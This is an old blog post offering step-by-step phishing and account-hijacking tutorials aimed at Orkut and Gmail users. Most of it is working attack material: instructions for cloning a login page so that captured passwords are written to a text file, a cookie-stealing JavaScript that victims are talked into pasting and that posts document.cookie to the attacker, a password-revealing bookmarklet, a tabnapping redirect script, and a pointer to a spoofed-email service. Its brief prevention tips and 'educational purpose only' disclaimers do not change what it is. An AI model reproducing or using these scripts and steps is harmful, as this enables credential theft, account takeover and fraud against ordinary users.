Friday, 29 June 2012

How to hack with phishing


What Is Phishing ?
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
ü Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
ü Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
ü Emails containing some Information of your Interest and asking you to Login to Your Account.
ü Any Email carrying a Link to Click and asking you to Login.
The Phishing Hack Starts Now. this Hack example is for orkut account.
Step 1:- Download the necessary files Which you will need during the phishing attack. This file is a .rar file which
includes 3 files named hackingtech.php, hackingtech.txt & ServiceLogin.html and also consist a folder in which
there are support files for ServerLogin.html
Step 2:- Unrar the download pack named orkuthacking.rar any where on your computer.
Step 3:- Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" in any
web hosting site..
You will have to create a sub-folder in the web hosting site's directory. Name that folder as "ServiceLogin_files" and
upload the 2 images of the pack in that folder. (it must support PHPs.)
>>> You can choose one of the following web hosting Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com{Recommended}
http://www.110mb.com
http://www.phpnet.us
“You can Download the pack From Here: http://www.hackingtech.co.tv/orkuthacking.rar “.
Step 4:- Your work is over now. Just give the link ofurfake page to the victim and whenever he/she will type the password
and sign in . Password will be stored in "hackingtech.txt"...
General form of the fake page's link
Code:
http://urwebhostingsite/urusername/ServiceLogin.htm
Step 5:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkut
the your orkut account has a security problem pl. click on th link below and re-activate your account. we will see how to
send fake email within short time.
Now If You want to create your own phishing page the follow the steps below.
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hackingtech.php and it should
be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
Step 9:-Now Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" and
serverlogin.htm file in any web hosting site you want.
Step 10:-You are done just go to the link of the file serverlogin.htm given by your hosting company .
Step 11:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of
orkut the your orkut account has a security problem pl. click on th link below and re-activate your account. we will see
how to send fake email within short time.
Step 12:-To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company .
Prevention Against Phishing :-
ü Read all the Email Carefully and Check if the Sender is Original.
ü Watch the Link Carefully before Clicking
ü Always check the URL in the Browser before Signing IN to your Account
ü Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email.
“Do not use this hack trick in any criminal activities like phishing bank websites and please do not
destroy any ones account this is only for educational purpose”.
 How To View Hidden Password behind ****
Step 1.First of all open up the webpage on which you wanna show the hidden passwords.
Step 2. Then in the username there must be the name and in the password there must be ********
Step 3.Now to see the password which is behind the ******** Just copy and paste the following JavaScript into the
address bar of the browser and you are done.
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Step 4. After copying and pasting the JavaScript given above press the enter key and hidden passwords will be shown to
you.
“You can use This script when some one has checked the remember me button in the login form
of any website and to reveal password from that saved astrisk or encrypted password”.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
Hack Orkut Accounts by Cookie Stealing
This article below explains the method to hack orkut account by stealing orkut account cookies. Hacking orkut accounts
has become much popular and hence i have added this article which will help you in hacking your friend’s orkut account.
Just ask the victim to copy the script in address bar and then you will be able to login/access /hack his orkut account.
Note: My purpose is only to make u aware of what’s happening around and not to teach u hacking orkut account, Gmail
or any account in any sort!!.
Procedure for hacking orkut account by stealing orkut cookies from Mozilla Firefox to hack Gmail or orkut is given below.
"Hacking orkut account or Gmail” by "stealing orkut account cookies”:
The post explains how one can steal cookies to hack orkut account or Gmail account. No password cracking method
required.
Steps to hack Gmail or orkut account password by stealing orkut cookies:-
Step 1. Firstly you need have Mozilla firefox.
Step2. Cookie editor plugin for Mozilla firefox.
Step 3. You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to
one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two
Gmail(Orkut) accounts.
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()
How to use orkut cookies script?
Step 1. Replace your number "UserId.value=33444211
 How to Replace your Number
Step 1. Go to your Orkut album
Step 2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
Step 3. Now replace your value with the value in the java script.
“Download cookie editor plugin for Mozilla firefox from: https://addons.mozilla.org/en-US/firefox/addon/573
Your script will look like -
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()
Step 2. Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.
Step 3. You’ll get his orkut account cookie in your scrap book.
Step 4. After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie
editor plugin( Tools–> Cookie editor)
Step 5. click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the orkut_state part with your
victim’s Script
put ur eight digit number in the place of (33444211).
Thats it your done with.
Logout of your orkut and login again and you’ll be in your victims Homepage.
Step 6. So remember guys…if you are having orkut account or having any other account….never use any suspicious script
to prevent anyone from hacking/accessing your orkut account.
I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut
accounts and then access victim’s orkut account. Enjoy hacking orkut.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
“You can also use this attack for many other sites like yahoo but you will need some other scripts
for that but nothing is impossible so use google and search the script for other sites for self
practice”.
 Tab Napping A New Phishing Attack

Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really
paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by
hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change
the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background.
Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them.
Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As
Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is
mailable and moldable and the user will most likely simply think they left *the+ tab open.”
The only clue that you’re being tricked is that the URL will be wrong.
The Script Used is as Below.-
<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
To See The Demo Of this Attack visit: http://www.hackingtech.co.tv/tabnapping.html
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
How to Check The email is original or Not
First of all let us see How email system is working over internet.
The email is sent on internet as shown in below picture
So Here The Sender i.e abc@server1.com is sending a mail to xyz@server2.in. so the sender will type the mail and click on
send button and the mail will go to SERVER1.com whereSERVER1.com will forward the mail over internet and the internet
will search the xyz@server2.in email ids server and send it to SERVER2.in and the the SERVER2.in will search for
the xyz@server2.in in their own database and then the mail will be forwarded to xyz@server2.in and when the XYZ user
login to their account they will see an email in their inbox which is from abc@server1.com.
Now How To send the fake mail
To send fake mail We need to Bypass the abc@server1.com and SERVER1.com both and directly send an email over
internet .
So for that we will use a .php script as php has a function mail(); which can send email to any one without the
SERVER1.com and directly delivering the mail to SERVER2.in and then SERVER2.in will search for the xyz@server2.in in
their own database and then the mail will be forwarded to xyz@server2.in and when the XYZ user login to their account
they will see an email in their inbox which is from abc@server1.com.
But actually the email is not sent byabc@server1.comto xyz@server2.in so it is a fake mail.
SEND FAKE MAILS FROM HACKING TECH
Fill Up the form on Hacking Tech fake mailer page. For form visit http://www.hackingtech.co.tv/index/0-93
Now How to check When you receive such mail.
Step 1:- First of all open the mail.
Step 2:- Now Click on the downward arrow near reply button. and click on show original.
Now check for The received from field on the page opened.
and see who has sent you the email , here billgates@microsoft.com is the sender.
so in the received from field check that there must be microsoft.comand not any other thing.
this was fake mail as there was outgoing.x10hosting.com and so the mail is fake as there is no microsoft.com here.
“Do not send fake mails for criminal activities from hackingtech fake mailer as they are tracking
your IP address and Can back track you for any illegal activities performed by you and so please do
not destroy any ones account, this is for educational purpose only”.

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...